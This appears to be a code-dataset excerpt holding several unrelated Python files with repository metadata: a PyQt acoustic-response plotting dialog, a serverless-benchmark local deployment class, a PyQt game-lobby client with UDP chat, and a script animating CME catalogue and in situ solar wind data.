self.pushButton_AddImportedPlot.clicked.connect(self.ImportResults)
self.checkBox_dB = self.findChild(QCheckBox, 'checkBox_dB')
self.pushButton = self.findChild(QPushButton, 'pushButton')
self.pushButton.clicked.connect(self.check)
self.exec_()
def reset_imported_data(self):
self.imported_data = None
self.messages("The plot data has been reseted.")
def writeNodes(self, list_node_ids):
text = ""
for node in list_node_ids:
text += "{}, ".format(node)
self.lineEdit_nodeID.setText(text)
def keyPressEvent(self, event):
if event.key() == Qt.Key_Enter or event.key() == Qt.Key_Return:
self.check()
elif event.key() == Qt.Key_Escape:
self.close()
def radioButtonEvent_YAxis(self):
self.plotAbs = self.radioButton_plotAbs.isChecked()
self.plotReal = self.radioButton_plotReal.isChecked()
self.plotImag = self.radioButton_plotImag.isChecked()
def radioButtonEvent_save_data(self):
self.save_Absolute = self.radioButton_Absolute.isChecked()
self.save_Real_Imaginary = self.radioButton_Real_Imaginary.isChecked()
def messages(self, msg, title = " Information "):
msg_box = QMessageBox()
msg_box.setIcon(QMessageBox.Information)
msg_box.setText(msg)
msg_box.setWindowTitle(title)
msg_box.exec_()
def choose_path_import_results(self):
self.import_path, _ = QFileDialog.getOpenFileName(None, 'Open file', self.userPath, 'Dat Files (*.dat)')
self.import_name = basename(self.import_path)
self.lineEdit_ImportResultsPath.setText(str(self.import_path))
def ImportResults(self):
self.imported_data = np.loadtxt(self.import_path, delimiter=",")
self.legend_imported = "imported data: "+ basename(self.import_path).split(".")[0]
self.tabWidget_plot_results.setCurrentWidget(self.tab_plot)
self.messages("The results has been imported.")
def choose_path_export_results(self):
self.save_path = QFileDialog.getExistingDirectory(None, 'Choose a folder to export the results', self.userPath)
self.save_name = basename(self.save_path)
self.lineEdit_SaveResultsPath.setText(str(self.save_path))
def check(self, export=False):
try:
tokens = self.lineEdit_nodeID.text().strip().split(',')
try:
tokens.remove('')
except:
pass
node_typed = list(map(int, tokens))
if len(node_typed) == 1:
try:
self.nodeID = self.mesh.nodes[node_typed[0]].external_index
except:
message = [" The Node ID input values must be\n major than 1 and less than {}.".format(len(self.nodes))]
error(message[0], title = " INCORRECT NODE ID INPUT! ")
return
elif len(node_typed) == 0:
error("Please, enter a valid Node ID!")
return
else:
error("Multiple Node IDs", title="Error Node ID's")
return
except Exception:
error("Wrong input for Node ID's!", title="Error Node ID's")
return
if self.checkBox_dB.isChecked():
self.scale_dB = True
elif not self.checkBox_dB.isChecked():
self.scale_dB = False
if not export:
self.plot()
def ExportResults(self):
if self.lineEdit_FileName.text() != "":
if self.save_path != "":
self.export_path_folder = self.save_path + "/"
else:
error("Plese, choose a folder before trying export the results!")
return
else:
error("Inform a file name before trying export the results!")
return
self.check(export=True)
freq = self.frequencies
self.export_path = self.export_path_folder + self.lineEdit_FileName.text() + ".dat"
if self.save_Absolute:
response = get_acoustic_frf(self.mesh, self.solution, self.nodeID)
header = "Frequency[Hz], Real part [Pa], Imaginary part [Pa], Absolute [Pa]"
data_to_export = np.array([freq, np.real(response), np.imag(response), np.abs(response)]).T
elif self.save_Real_Imaginary:
response = get_acoustic_frf(self.mesh, self.solution, self.nodeID)
header = "Frequency[Hz], Real part [Pa], Imaginary part [Pa]"
data_to_export = np.array([freq, np.real(response), np.imag(response)]).T
np.savetxt(self.export_path, data_to_export, delimiter=",", header=header)
self.messages("The results has been exported.")
def dB(self, data):
p_ref = 20e-6
return 20*np.log10(data/p_ref)
def plot(self):
fig = plt.figure(figsize=[12,7])
ax = fig.add_subplot(1,1,1)
frequencies = self.frequencies
response = get_acoustic_frf(self.mesh, self.solution, self.nodeID, absolute=self.plotAbs, real=self.plotReal, imag=self.plotImag)
if self.scale_dB :
if self.plotAbs:
response = self.dB(response)
ax.set_ylabel("Acoustic Response - Absolute [dB]", fontsize = 14, fontweight = 'bold')
else:
if self.plotReal:
ax.set_ylabel("Acoustic Response - Real [Pa]", fontsize = 14, fontweight = 'bold')
elif self.plotImag:
ax.set_ylabel("Acoustic Response - Imaginary [Pa]", fontsize = 14, fontweight = 'bold')
self.messages("The dB scalling can only be applied with the absolute \nY-axis representation, therefore, it will be ignored.")
else:
if self.plotAbs:
ax.set_ylabel("Acoustic Response - Absolute [Pa]", fontsize = 14, fontweight = 'bold')
elif self.plotReal:
ax.set_ylabel("Acoustic Response - Real [Pa]", fontsize = 14, fontweight = 'bold')
elif self.plotImag:
ax.set_ylabel("Acoustic Response - Imaginary [Pa]", fontsize = 14, fontweight = 'bold')
# mng = plt.get_current_fig_manager()
# mng.window.state('zoomed')
#cursor = Cursor(ax)
cursor = SnaptoCursor(ax, frequencies, response, show_cursor=True)
plt.connect('motion_notify_event', cursor.mouse_move)
legend_label = "Acoustic Pressure at node {}".format(self.nodeID)
if self.imported_data is None:
if self.plotAbs and not self.scale_dB:
first_plot, = plt.semilogy(frequencies, response, color=[1,0,0], linewidth=2, label=legend_label)
else:
first_plot, = plt.plot(frequencies, response, color=[1,0,0], linewidth=2, label=legend_label)
_legends = plt.legend(handles=[first_plot], labels=[legend_label], loc='upper right')
else:
data = self.imported_data
imported_Xvalues = data[:,0]
if self.plotAbs:
imported_Yvalues = np.abs(data[:,1] + 1j*data[:,2])
if self.scale_dB :
imported_Yvalues = self.dB(imported_Yvalues)
elif self.plotReal:
imported_Yvalues = data[:,1]
elif self.plotImag:
imported_Yvalues = data[:,2]
if self.plotAbs and not self.scale_dB:
first_plot, = plt.semilogy(frequencies, response, color=[1,0,0], linewidth=2)
second_plot, = plt.semilogy(imported_Xvalues, imported_Yvalues, color=[0,0,1], linewidth=1, linestyle="--")
else:
first_plot, = plt.plot(frequencies, response, color=[1,0,0], linewidth=2)
second_plot, = plt.plot(imported_Xvalues, imported_Yvalues, color=[0,0,1], linewidth=1, linestyle="--")
_legends = plt.legend(handles=[first_plot, second_plot], labels=[legend_label, self.legend_imported], loc='upper right')
plt.gca().add_artist(_legends)
ax.set_title(('Frequency Response: {} Method').format(self.analysisMethod), fontsize = 18, fontweight = 'bold')
ax.set_xlabel(('Frequency [Hz]'), fontsize = 14, fontweight = 'bold')
plt.show() | atbrandao/OpenPulse_f | pulse/uix/user_input/plotAcousticFrequencyResponseInput.py | plotAcousticFrequencyResponseInput.py | py | 13,604 | python | en | code | null | github-code | 36 | [
{
"api_name": "numpy.max",
"line_number": 36,
"usage_type": "call"
},
{
"api_name": "numpy.searchsorted",
"line_number": 38,
"usage_type": "call"
},
{
"api_name": "matplotlib.pyplot.legend",
"line_number": 46,
"usage_type": "call"
},
{
"api_name": "matplotlib.pypl... |
6689931275 | import json
import os
from signal import SIGKILL
from statistics import mean
from typing import List, Optional
from sebs.cache import Cache
from sebs.local.function import LocalFunction
from sebs.storage.minio import Minio, MinioConfig
from sebs.utils import serialize, LoggingBase
class Deployment(LoggingBase):
    """Serializable record of a local deployment: functions, storage,
    benchmark inputs and (optionally) memory-measurement bookkeeping."""
    @property
    def measurement_file(self) -> Optional[str]:
        # Path of the temporary file the memory measurers append to, if any.
        return self._measurement_file
    @measurement_file.setter
    def measurement_file(self, val: Optional[str]):
        self._measurement_file = val
    def __init__(self):
        super().__init__()
        self._functions: List[LocalFunction] = []
        self._storage: Optional[Minio]
        self._inputs: List[dict] = []
        # PIDs of the external processes sampling container memory usage.
        self._memory_measurement_pids: List[int] = []
        self._measurement_file: Optional[str] = None
    def add_function(self, func: LocalFunction):
        """Register a deployed function; track its measurer PID if present."""
        self._functions.append(func)
        if func.memory_measurement_pid is not None:
            self._memory_measurement_pids.append(func.memory_measurement_pid)
    def add_input(self, func_input: dict):
        """Record one benchmark input configuration."""
        self._inputs.append(func_input)
    def set_storage(self, storage: Minio):
        """Attach the Minio storage instance used by this deployment."""
        self._storage = storage
    def serialize(self, path: str):
        """Write this deployment (functions, storage, inputs, measurements)
        as JSON to *path* so it can be restored with :meth:`deserialize`."""
        with open(path, "w") as out:
            config: dict = {
                "functions": self._functions,
                "storage": self._storage,
                "inputs": self._inputs,
            }
            if self._measurement_file is not None:
                config["memory_measurements"] = {
                    "pids": self._memory_measurement_pids,
                    "file": self._measurement_file,
                }
            out.write(serialize(config))
    @staticmethod
    def deserialize(path: str, cache_client: Cache) -> "Deployment":
        """Rebuild a Deployment from the JSON file written by :meth:`serialize`."""
        with open(path, "r") as in_f:
            input_data = json.load(in_f)
            deployment = Deployment()
            for input_cfg in input_data["inputs"]:
                deployment._inputs.append(input_cfg)
            for func in input_data["functions"]:
                deployment._functions.append(LocalFunction.deserialize(func))
            if "memory_measurements" in input_data:
                deployment._memory_measurement_pids = input_data["memory_measurements"]["pids"]
                deployment._measurement_file = input_data["memory_measurements"]["file"]
            deployment._storage = Minio.deserialize(
                MinioConfig.deserialize(input_data["storage"]), cache_client
            )
            return deployment
    def shutdown(self, output_json: str):
        """Kill the memory measurers, aggregate their samples into
        *output_json*, and stop all function containers."""
        if len(self._memory_measurement_pids) > 0:
            self.logging.info("Killing memory measurement processes")
            # kill measuring processes
            for proc in self._memory_measurement_pids:
                os.kill(proc, SIGKILL)
        if self._measurement_file is not None:
            self.logging.info(f"Gathering memory measurement data in {output_json}")
            # create dictionary with the measurements
            # Each measurement line is "<container> <bytes>"; malformed lines
            # are skipped, and "precision not met" lines are only counted.
            measurements: dict = {}
            precision_errors = 0
            with open(self._measurement_file, "r") as file:
                for line in file:
                    if line == "precision not met\n":
                        precision_errors += 1
                    line_content = line.split()
                    if len(line_content) == 0:
                        continue
                    if not line_content[0] in measurements:
                        try:
                            measurements[line_content[0]] = [int(line_content[1])]
                        except ValueError:
                            continue
                    else:
                        try:
                            measurements[line_content[0]].append(int(line_content[1]))
                        except ValueError:
                            continue
            # Reduce each container's raw samples to summary statistics
            # (values are bytes; /1e6 converts to MB for display).
            for container in measurements:
                measurements[container] = {
                    "mean mem. usage": f"{mean(measurements[container])/1e6} MB",
                    "max mem. usage": f"{max(measurements[container])/1e6} MB",
                    "number of measurements": len(measurements[container]),
                    "full profile (in bytes)": measurements[container],
                }
            # write to output_json file
            with open(output_json, "w") as out:
                if precision_errors > 0:
                    measurements["precision_errors"] = precision_errors
                json.dump(measurements, out, indent=6)
            # remove the temporary file the measurements were written to
            os.remove(self._measurement_file)
        for func in self._functions:
            func.stop()
| spcl/serverless-benchmarks | sebs/local/deployment.py | deployment.py | py | 4,773 | python | en | code | 97 | github-code | 36 | [
{
"api_name": "sebs.utils.LoggingBase",
"line_number": 13,
"usage_type": "name"
},
{
"api_name": "typing.Optional",
"line_number": 15,
"usage_type": "name"
},
{
"api_name": "typing.Optional",
"line_number": 19,
"usage_type": "name"
},
{
"api_name": "typing.List",
... |
27632896757 | import socket
import gui.main_gui as main_gui
import configparser
import lib.package
from PyQt5 import QtWidgets
from PyQt5.QtWidgets import QMessageBox
from game_class import Game_class
""" Загрузка параметров """
config = configparser.ConfigParser()
config.read("config.ini")
# Main lobby window
class MainApp(QtWidgets.QMainWindow, main_gui.Ui_MainWindow):
    """Main client window: lets the player connect to a game room, exchange
    chat messages over UDP, and edit the server connection settings."""

    def __init__(self, login):
        super().__init__()
        self.setupUi(self)
        self.login = login
        self.label.setText("Ваш логин: " + login)
        # Pre-fill host/port fields from config.ini
        self.lineEdit.setText(config["Server"]["host"])
        self.lineEdit_4.setText(config["Server"]["port_client"])
        self.pushButton.clicked.connect(self.connect)
        self.pushButton_2.clicked.connect(self.set_config)
        self.pushButton_3.clicked.connect(self.post_message)
        self.pushButton_4.clicked.connect(self.get_message)
        self.textEdit.setReadOnly(True)
        # Character classes (mage / warrior / assassin)
        self.comboBox.addItem("маг")
        self.comboBox.addItem("воин")
        self.comboBox.addItem("убийца")
        # UDP socket used both for sending requests and receiving replies
        self.sor = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
        self.sor.bind(('', 0))
        self.get_message()

    def message(self, icon, title, text, button):
        """Show a modal QMessageBox with the given icon, title, text, button."""
        msg = QMessageBox()
        msg.setIcon(icon)
        msg.setWindowTitle(title)
        msg.setText(text)
        msg.setStandardButtons(button)
        msg.exec_()

    def connect(self):
        """Ask the server to join a room; on success start the game client."""
        # Build the request
        data = lib.package.set_package(command='c', login=self.login)
        # Send the request to the server
        self.sor.sendto(data.encode('utf-8'), (config["Server"]["host"], int(config["Server"]["port_client"])))
        # Receive the server's reply (blocking)
        data = self.sor.recv(1024).decode('utf-8')
        # '0' means we may join the room
        if data == '0':
            self.close()
            type = self.comboBox.currentText()  # NOTE(review): shadows builtin `type`
            game = Game_class(self.login, type)
            game.start()
        else:
            self.message(QMessageBox.Critical, "Ошибка", "Ошибка ", QMessageBox.Cancel)

    def set_config(self):
        """Persist the host/port entered in the UI back to config.ini."""
        host = self.lineEdit.text()
        port_client = self.lineEdit_4.text()
        config.set('Server', 'host', str(host))
        config.set('Server', 'port_client', str(port_client))
        with open('config.ini', 'w') as configfile:
            config.write(configfile)
        print("done")

    def post_message(self):
        """Send the chat line from the input field, then refresh the chat."""
        message = self.lineEdit_5.text()
        # Build the request
        data = lib.package.set_package(command='m', login=self.login, message=message)
        # Send the request to the server
        self.sor.sendto(data.encode('utf-8'), (config["Server"]["host"], int(config["Server"]["port_client"])))
        # Refresh the chat window and clear the input line
        self.get_message()
        self.lineEdit_5.setText("")

    def get_message(self):
        """Fetch the chat log from the server and render it as HTML."""
        # Build the request
        data = lib.package.set_package(command='g')
        # Send the request to the server
        self.sor.sendto(data.encode('utf-8'), (config["Server"]["host"], int(config["Server"]["port_client"])))
        # Receive the server's reply
        data = self.sor.recv(1024).decode('utf-8')
        # Decode the server packet
        map = lib.package.get_package(data)  # NOTE(review): shadows builtin `map`
        data = map["message"]
        # Reformat the raw text into HTML. The wire format appears to be
        # alternating login/text fields separated by '/' and terminated by
        # '!' — TODO confirm against the server-side packet format.
        message = ""
        login = ""
        text = ""
        flag = 0
        for i in data:
            if i == "/":
                if flag == 0:
                    # finished a login field: own login red, others green
                    flag = 1
                    if self.login == login:
                        message += "<font color=\"Red\">" + login + "</font>: "
                    else:
                        message += "<font color=\"Green\">" + login + "</font>: "
                    login = ""
                else:
                    # finished a message body
                    flag = 0
                    message += "<font color=\"Black\">" + text + "</font><br>"
                    text = ""
                continue
            if i == "!":
                break
            # accumulate characters into the current field
            if flag == 0:
                login += i
            if flag == 1:
                text += i
        # Render the messages
        self.textEdit.setHtml(message)
{
"api_name": "configparser.ConfigParser",
"line_number": 10,
"usage_type": "call"
},
{
"api_name": "PyQt5.QtWidgets.QMainWindow",
"line_number": 14,
"usage_type": "attribute"
},
{
"api_name": "PyQt5.QtWidgets",
"line_number": 14,
"usage_type": "name"
},
{
"api_na... |
70188062823 | #animation ICMECAT rose scatter plot with HI CME circles and in situ data
from scipy import stats
import scipy.io
from matplotlib import cm
import sys
import os
import matplotlib
import matplotlib.pyplot as plt
import matplotlib.dates as mdates
import numpy as np
import sunpy.time
import time
import pickle
import seaborn as sns
import math
#for reading catalogues
def getcat(filename):
    """Read a HELCATS catalogue from an IDL .sav file and return it."""
    print('reading CAT ' + filename)
    catalogue = scipy.io.readsav(filename, verbose='true')
    print('done reading CAT')
    return catalogue
def getpositions(filename):
    """Read spacecraft/planet positions from an IDL .sav file and return them."""
    print('reading positions in ' + filename)
    positions = scipy.io.readsav(filename, verbose='true')
    print('done reading positions')
    return positions
def time_to_num_cat(time_in):
    """Convert catalogue timestamps (bytes from scipy.readsav) to plot times.

    Each entry like b'2007-11-17T07:20:00' or b'2007-11-17T07:20Z' is cut to
    its first 16 characters and ':00' is appended, yielding a canonical
    'YYYY-MM-DDTHH:MM:00' string.  Valid years (< 2100) are additionally
    converted to matplotlib date numbers (days since 0001-01-01 UTC, plus 1);
    placeholder years (e.g. 9999) keep a numeric value of 0.

    :param time_in: sequence of byte strings
    :return: (time_num, time_str) — float array of matplotlib dates and the
             array of normalized time strings.

    Fix: removed the dead expression statement ``time_str[j]`` from the loop
    and replaced the manual counter with a direct index loop.
    """
    time_str = ['' for _ in range(len(time_in))]
    time_num = np.zeros(np.size(time_in))
    for j in range(len(time_in)):
        # decode from bytes (output of scipy.readsav) and normalize seconds
        time_str[j] = time_in[j][0:16].decode() + ':00'
        year = int(time_str[j][0:4])
        # only convert valid times, so placeholder year 9999 stays 0
        if year < 2100:
            time_num[j] = mdates.date2num(sunpy.time.parse_time(time_str[j]))
    return time_num, np.array(time_str)
def decode_array(bytearrin):
    """Decode an array of byte strings (IDL .sav output) to a numpy array of
    Python strings, suitable for use with numpy "where".

    Fix: the original iterated over ``range(0, len(bytearrin) - 1)`` and
    therefore left the LAST element as an empty string; all elements are now
    decoded.
    """
    return np.array([entry.decode() for entry in bytearrin])
def IDL_time_to_num(time_in):
    """Convert a sequence of IDL time strings to matplotlib date numbers."""
    converted = [mdates.date2num(sunpy.time.parse_time(entry)) for entry in time_in]
    return np.array(converted)
######################################################
# main program: load catalogues, in situ data and positions for the animation
plt.close('all')
sns.set_context("talk")
sns.set_style("darkgrid")

################## CONTROLS
#how much time is between frames, in days (0.25 = 6 hours)
dayjump=0.25
#either keep or fade detections (mutually exclusive switches)
fade=1
keep=0
#if keep is selected, the alpha for plotting each dot
keepalpha=0.7
#how long an ARRIVAL stays visible in fade mode, in days
fadedays=30
#how big the circles are on the plot (marker-size scaling factor)
bscale=4
#half width of the SSEF30 CME circles, in degrees
lamda=30
################################

print( 'start icmecat animation program.')

#get ICMECAT
filename_icmecat='ALLCATS/HELCATS_ICMECAT_v10_SCEQ.sav'
i=getcat(filename_icmecat)

#get parameters
bmean=i.icmecat['MO_BMEAN']*bscale #bscale makes circles larger in movie
long=i.icmecat['SC_LONG_HEEQ']*np.pi/180 #heeq longitude converted to radians
rdist=i.icmecat['sc_heliodistance'] #AU
sc=i.icmecat['sc_insitu'] #string
sc=decode_array(sc)

#get indices of events at the different spacecraft
vexind=np.where(sc == 'VEX')
staind=np.where(sc == 'STEREO-A')
stbind=np.where(sc == 'STEREO-B')
winind=np.where(sc == 'Wind')
mesind=np.where(sc == 'MESSENGER')
ulyind=np.where(sc == 'ULYSSES')

##################################### read in situ magnetic field data
print( 'read MESSENGER')
#get insitu data
mes= pickle.load( open( "DATACAT/MES_2007to2015_SCEQ_removed.p", "rb" ) )
#time conversion
#mes_time=IDL_time_to_num(mes.time)
print( 'read MESSENGER done.')

print ('read VEX')
#get insitu data
vex= pickle.load( open( "DATACAT/VEX_2007to2014_SCEQ_removed.p", "rb" ) )
#time conversion
#vex_time=IDL_time_to_num(vex.time)
print( 'read VEX done.')

print( 'read Wind')
#get insitu data
wind= pickle.load( open( "DATACAT/WIND_2007to2016_HEEQ.p", "rb" ) )
#time conversion
#wind_time=IDL_time_to_num(wind.time)
print( 'read Wind done.')

print( 'read STEREO-A')
#get insitu data
sta= pickle.load( open( "DATACAT/STA_2007to2015_SCEQ.p", "rb" ) )
#time conversion
#sta_time=IDL_time_to_num(sta.time)
print( 'read STA done.')

print( 'read STEREO-B')
#get insitu data
stb= pickle.load( open( "DATACAT/STB_2007to2014_SCEQ.p", "rb" ) )
#time conversion
#stb_time=IDL_time_to_num(stb.time)
print( 'read STB done.')

#save times
#pickle.dump([vex_time,wind_time,sta_time,stb_time,mes_time], open( "DATACAT/Insitu_times_mdates_2.p", "wb" ) )
#quicker when just reloading the pre-converted times
[vex_time,wind_time,sta_time,stb_time,mes_time]=pickle.load( open( "DATACAT/Insitu_times_mdates_2.p", "rb" ) )
#print 'loaded in situ times'

######################################
#get positions (available as pos.mercury etc.)
pos=getpositions('DATACAT/positions_2007_2018_HEEQ_6hours.sav')
[pos_time_num,pos_time_str]=time_to_num_cat(pos.time)

#get cme apex positions from the HI catalogue
h=getcat('ALLCATS/hicat_v3_cat_behind_visual.sav')
[h_time_num,h_time_str]=time_to_num_cat(h.all_apex_t_str)
all_apex_s=decode_array(h.all_apex_s)

#make time conversion for all icme_start_time variables
icme_start_time_str=i.icmecat['icme_start_time']
#save it as matplotlib date number
[icme_start_time_num,icme_start_time_str]=time_to_num_cat(icme_start_time_str)

#for each spacecraft, make a zeros array tracking which ICMEs are "active"
active_icme_vex=np.zeros(np.size(icme_start_time_num))
active_icme_stb=np.zeros(np.size(icme_start_time_num))
active_icme_sta=np.zeros(np.size(icme_start_time_num))
active_icme_win=np.zeros(np.size(icme_start_time_num))
active_icme_mes=np.zeros(np.size(icme_start_time_num))
active_icme_uly=np.zeros(np.size(icme_start_time_num))

#initiate plot
plt.figure(1, figsize=(12, 6), dpi=100, facecolor='w', edgecolor='w')

#movie start epoch; frame k is frame_time_num + k days
frame_time_num=mdates.date2num(sunpy.time.parse_time('2007-Apr-1'))
################################### plot over all frames
for k in np.arange(12680/4,(12680+120)/4,dayjump):

    #k is the offset in days from frame_time_num (12680/4 = 3170 days)
    start=time.time()

    #to current frame time, the days need to be added, so +k is done
    #save frame time as string to write on plot
    frame_time_str=str(mdates.num2date(frame_time_num+k))
    print( 'current frame_time_num+k', frame_time_str)

    #for each frame time, check active ICMEs by looking into the full catalogue:
    for m in range(0,len(icme_start_time_num)):

        #calculate difference in icme_start_time to current frame
        icme_diff_to_frame=(frame_time_num+k)-icme_start_time_num[m]

        #for all icme_start_times that are later than the current frame,
        #make them active for 30 days (fading) or infinite (keeping).

        #**********************for fading
        if fade > 0:
            if icme_diff_to_frame > 0 and icme_diff_to_frame < fadedays:
                #check if this active icme belongs to a spacecraft
                #in1d compares two arrays; true or 1 if m is contained in vexind
                if np.in1d(m,vexind) == 1:
                    active_icme_vex[m]=icme_diff_to_frame
                #same for the other spacecraft
                if np.in1d(m,stbind) == 1:
                    active_icme_stb[m]=icme_diff_to_frame
                if np.in1d(m,staind) == 1:
                    active_icme_sta[m]=icme_diff_to_frame
                if np.in1d(m,winind) == 1:
                    active_icme_win[m]=icme_diff_to_frame
                if np.in1d(m,mesind) == 1:
                    active_icme_mes[m]=icme_diff_to_frame
                if np.in1d(m,ulyind) == 1:
                    active_icme_uly[m]=icme_diff_to_frame
            else:
                #if no detection, set the index to 0
                active_icme_vex[m]=0
                active_icme_stb[m]=0
                active_icme_sta[m]=0
                active_icme_win[m]=0
                active_icme_mes[m]=0
                active_icme_uly[m]=0

        #************************** for keeping (note: no Ulysses branch here)
        if keep > 0:
            if icme_diff_to_frame > 0:
                #check if this active icme belongs to a spacecraft
                #in1d compares two arrays; true or 1 if m is contained in vexind
                if np.in1d(m,vexind) == 1:
                    active_icme_vex[m]=icme_diff_to_frame
                #same for the other spacecraft
                if np.in1d(m,stbind) == 1:
                    active_icme_stb[m]=icme_diff_to_frame
                if np.in1d(m,staind) == 1:
                    active_icme_sta[m]=icme_diff_to_frame
                if np.in1d(m,winind) == 1:
                    active_icme_win[m]=icme_diff_to_frame
                if np.in1d(m,mesind) == 1:
                    active_icme_mes[m]=icme_diff_to_frame
            else:
                #if no detection, set the index to 0
                active_icme_vex[m]=0
                active_icme_stb[m]=0
                active_icme_sta[m]=0
                active_icme_win[m]=0
                active_icme_mes[m]=0

    #look which ICMEs are active
    active_index_vex=np.where(active_icme_vex > 0)
    active_index_stb=np.where(active_icme_stb > 0)
    active_index_sta=np.where(active_icme_sta > 0)
    active_index_win=np.where(active_icme_win > 0)
    active_index_mes=np.where(active_icme_mes > 0)
    active_index_uly=np.where(active_icme_uly > 0)
    #print 'active icme indices are:', active_index_vex
    print (' ')

    #check for active CME indices from HICAT (with the lists produced in IDL for the apex positions)
    #check where time is identical to frame time
    cmeind=np.where(h_time_num == frame_time_num+k)

    ############make plot
    # subplot2grid layout is (rows, columns), starts with 0
    ax = plt.subplot2grid((5,2), (0, 0), rowspan=5, projection='polar')
    #ax = plt.subplot(121,projection='polar')

    ######################## 1 plot all active CME circles
    #ax.scatter(h.all_apex_long[cmeind]*np.pi/180,h.all_apex_r[cmeind], s=10, c='black', alpha=1, marker='s')
    #if np.size(cmeind) >0:
    for p in range(0,np.size(cmeind)):
        #print p, h.all_apex_long[cmeind[0][p]], h.all_apex_r[cmeind[0][p]]
        #central direction unit vector scaled by the apex distance
        dir=np.array([np.cos(h.all_apex_long[cmeind[0][p]]*np.pi/180),np.sin(h.all_apex_long[cmeind[0][p]]*np.pi/180)])*h.all_apex_r[cmeind[0][p]]
        #points on circle, correct for longitude
        circ_ang = ((np.arange(111)*2-20)*np.pi/180)-(h.all_apex_long[cmeind[0][p]]*np.pi/180)
        #these SSE geometry equations are from Moestl and Davies 2013
        xc = 0+dir[0]/(1+np.sin(lamda*np.pi/180)) + (h.all_apex_r[cmeind[0][p]]*np.sin(lamda*np.pi/180)/(1+np.sin(lamda*np.pi/180)))*np.sin(circ_ang)
        yc = 0+dir[1]/(1+np.sin(lamda*np.pi/180)) + (h.all_apex_r[cmeind[0][p]]*np.sin(lamda*np.pi/180)/(1+np.sin(lamda*np.pi/180)))*np.cos(circ_ang)
        #now convert to polar coordinates
        rcirc=np.sqrt(xc**2+yc**2)
        longcirc=np.arctan2(yc,xc)
        #plot in correct color per observing spacecraft
        if all_apex_s[cmeind[0][p]] == 'A':
            #make alpha dependent on distance to solar equatorial plane - maximum latitude is -40/+40 -
            #so to make also the -/+40 latitude CME visible, divide by 50 so alpha > 0 for these events
            ax.plot(longcirc,rcirc, c='red', alpha=1-abs(h.all_apex_lat[cmeind[0][p]]/50), lw=1.5)
        if all_apex_s[cmeind[0][p]] == 'B':
            ax.plot(longcirc,rcirc, c='royalblue', alpha=1-abs(h.all_apex_lat[cmeind[0][p]]/50), lw=1.5)

    ####################### 3 plot ICME detections
    #fader style plot alpha dependent on time difference - for this loop over each element:
    if fade >0:
        for y in range(0,np.size(active_index_vex)):
            z=active_index_vex[0][y] #access elements in tuple that is produced by where
            fadealpha=1-active_icme_vex[z]/(fadedays) #fadedays is maximum difference in time, and alpha from 0 to 1
            ax.scatter(long[z], rdist[z], s=bmean[z], c='orange', alpha=fadealpha)
        for y in range(0,np.size(active_index_sta)):
            z=active_index_sta[0][y]
            fadealpha=1-active_icme_sta[z]/(fadedays) #30 days is maximum difference in time, and alpha from 0 to 1
            ax.scatter(long[z], rdist[z], s=bmean[z], c='red', alpha=fadealpha)
        for y in range(0,np.size(active_index_stb)):
            z=active_index_stb[0][y]
            fadealpha=1-active_icme_stb[z]/(fadedays) #30 days is maximum difference in time, and alpha from 0 to 1
            ax.scatter(long[z], rdist[z], s=bmean[z], c='royalblue', alpha=fadealpha)
        for y in range(0,np.size(active_index_win)):
            z=active_index_win[0][y]
            fadealpha=1-active_icme_win[z]/(fadedays) #30 days is maximum difference in time, and alpha from 0 to 1
            ax.scatter(long[z], rdist[z], s=bmean[z], c='mediumseagreen', alpha=fadealpha)
        for y in range(0,np.size(active_index_mes)):
            z=active_index_mes[0][y]
            fadealpha=1-active_icme_mes[z]/(fadedays) #30 days is maximum difference in time, and alpha from 0 to 1
            ax.scatter(long[z], rdist[z], s=bmean[z], c='dimgrey', alpha=fadealpha)
        for y in range(0,np.size(active_index_uly)):
            z=active_index_uly[0][y]
            fadealpha=1-active_icme_uly[z]/(fadedays) #30 days is maximum difference in time, and alpha from 0 to 1
            ax.scatter(long[z], rdist[z], s=bmean[z], c='darkolivegreen', alpha=fadealpha)

    if keep >0:
        ax.scatter(long[active_index_vex], rdist[active_index_vex], s=bmean[active_index_vex], c='orange', alpha=keepalpha)
        ax.scatter(long[active_index_sta], rdist[active_index_sta], s=bmean[active_index_sta], c='red', alpha=keepalpha)
        ax.scatter(long[active_index_stb], rdist[active_index_stb], s=bmean[active_index_stb], c='royalblue', alpha=keepalpha)
        ax.scatter(long[active_index_win], rdist[active_index_win], s=bmean[active_index_win], c='mediumseagreen', alpha=keepalpha)
        ax.scatter(long[active_index_mes], rdist[active_index_mes], s=bmean[active_index_mes], c='dimgrey', alpha=keepalpha)

    plt.suptitle('STEREO/HI modeled CMEs (SSEF30) + in situ ICME detections and data HELCATS - HIGEOCAT ICMECAT DATACAT', fontsize=12)

    #Sun
    ax.scatter(0,0,s=100,c='yellow',alpha=0.8, edgecolors='yellow')
    plt.figtext(0.30,0.5,'Sun', fontsize=10, ha='center')
    #Earth
    plt.figtext(0.30,0.25,'Earth', fontsize=10, ha='center')
    #units
    #plt.figtext(0.525,0.0735,'HEEQ longitude', fontsize=10, ha='left')
    #plt.figtext(0.655,0.164,'AU', fontsize=10, ha='center')

    #----------------- legend
    plt.figtext(0.05,0.02,'Mercury', color='dimgrey', ha='center', fontsize=12)
    plt.figtext(0.15,0.02,'MESSENGER', color='dimgrey', ha='center', fontsize=10)
    plt.figtext(0.25 ,0.02,'Venus', color='orange', ha='center',fontsize=12)
    plt.figtext(0.35,0.02,'STEREO-A', color='red', ha='center',fontsize=12)
    plt.figtext(0.48,0.02,'STEREO-B', color='royalblue', ha='center',fontsize=12)
    plt.figtext(0.58,0.02,'Earth', color='mediumseagreen', ha='center',fontsize=12)
    plt.figtext(0.65,0.02,'Mars', color='orangered', ha='center',fontsize=10)
    plt.figtext(0.71,0.02,'MSL', color='magenta', ha='center', fontsize=10)
    plt.figtext(0.76,0.02,'Maven', color='steelblue', ha='center', fontsize=10)
    plt.figtext(0.83,0.02,'Ulysses', color='darkolivegreen', ha='center', fontsize=10)
    plt.figtext(0.90,0.02,'Rosetta', color='black', ha='center', fontsize=10)

    #add legend for bmean (marker size scale)
    bleg=np.array([10,50,100])*bscale
    blegstr=['10 nT','50','100']
    blegr=np.zeros(len(bleg))+1.6
    blegt=np.radians(range(170,195,10))
    ax.scatter(blegt, blegr,s=bleg,c='violet', edgecolor='violet')
    for p in range(0,len(bleg)):
        ax.annotate(blegstr[p],xy=(blegt[p],blegr[p]-0.2), ha='center', va='center', fontsize=8)

    ############################## plot positions
    #check which index is closest in positions to current time
    #frame_time_num+k vs. pos_time_num
    timeind=np.where(frame_time_num+k-pos_time_num == min(abs((frame_time_num+k)-pos_time_num)))

    #index 1 is longitude, 0 is rdist
